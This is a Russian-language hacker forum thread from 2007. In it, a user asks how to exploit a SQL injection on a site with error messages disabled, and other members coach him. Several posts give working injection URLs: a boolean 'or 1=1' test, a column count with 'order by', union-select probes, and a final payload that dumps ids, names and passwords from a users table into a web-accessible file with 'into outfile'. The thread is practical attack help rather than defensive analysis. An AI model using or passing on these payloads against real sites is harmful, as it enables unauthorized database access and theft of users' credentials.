sql inj вслепую?
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя |
Сообщение |
<< Старые топики Новые топики >> |
|
|
sql inj вслепую? - 2007-09-19 08:15:44.736666
|
|
|
nunthrey
Сообщений: 4
Оценки: 0
Присоединился: 2007-09-19 07:52:25.186666
|
есть сайт со страницами вида: http://site.com/index.html?id=32 ( именно, что html). Ошибки отключены В параметре id - sql-инъекция, т.к. http://site.com/index.html?id=-1 or 1=1 работает если поставить в конце комментарий, то не выводит ничего. Как такое может быть? Подскажите, что дальше?
|
|
|
RE: sql inj вслепую? - 2007-09-19 10:19:53.396666
|
|
|
Pupkin-Zade
Сообщений: 9398
Оценки: 1489
Присоединился: 2004-03-10 13:54:16
|
Называется blind SQL injection, слепая инъекция Описана много раз
|
|
|
RE: sql inj вслепую? - 2007-09-19 12:52:52.053333
|
|
|
nunthrey
Сообщений: 4
Оценки: 0
Присоединился: 2007-09-19 07:52:25.186666
|
Эт я все читал. Теперь понял, что там скобку нужно закрыть. Вот так подобрал количество столбцов: http://site.com/index.html?id=32) order by 9– А вот так не работает: http://site.com/index.html?id=-1) union select null,null,null,null,null,null,null,null,null– Теперь то что не так?
|
|
|
RE: sql inj вслепую? - 2007-09-19 16:57:56.733333
|
|
|
Dimonelite
Сообщений: 348
Оценки: 0
Присоединился: 2005-12-05 20:55:07
|
quote:
ORIGINAL: nunthrey А вот так не работает: http://site.com/index.html?id=-1) union select null,null,null,null,null,null,null,null,null– а ты что хочешь, чтобы тебе вывело? ) вместо null для начала подставь какие-нибудь более значящие значения(например 1,2,3,…)
|
|
|
RE: sql inj вслепую? - 2007-09-19 18:45:05.540000
|
|
|
nunthrey
Сообщений: 4
Оценки: 0
Присоединился: 2007-09-19 07:52:25.186666
|
quote:
ORIGINAL: Dimonelite а ты что хочешь, чтобы тебе вывело? ) вместо null для начала подставь какие-нибудь более значящие значения(например 1,2,3,…) Блин, ошибся. Я вот так делал: http://site.com/index.html?id=32) union select null,null,null,null,null,null,null,null,null– Запрос по смыслу правильный и должен выводить то же самое, что и без юниона. Разве нет? Так вот он ничего не выводит…
|
|
|
RE: sql inj вслепую? - 2007-09-30 00:30:18.566666
|
|
|
muse
Сообщений: 112
Оценки: 0
Присоединился: 2005-06-09 00:40:48
|
нет.читай статьи внимательнее. blind sql injection это когда на странице не выводится результат. С этим нужно бороться с помощью outflite. Тоесть когда подобрал кол-во столбцов и имя таблицы результат можно вывести в файт но для этого еще нужно знать полный путь к сайту Например http://site.ru/index.php?id=-99999+union+select+1,2,id,4,name,6,password,8,9,10,11,12,13+from+users+into+outfile+'/srv/www/site.ru/1.txt'
|
|
|
|
|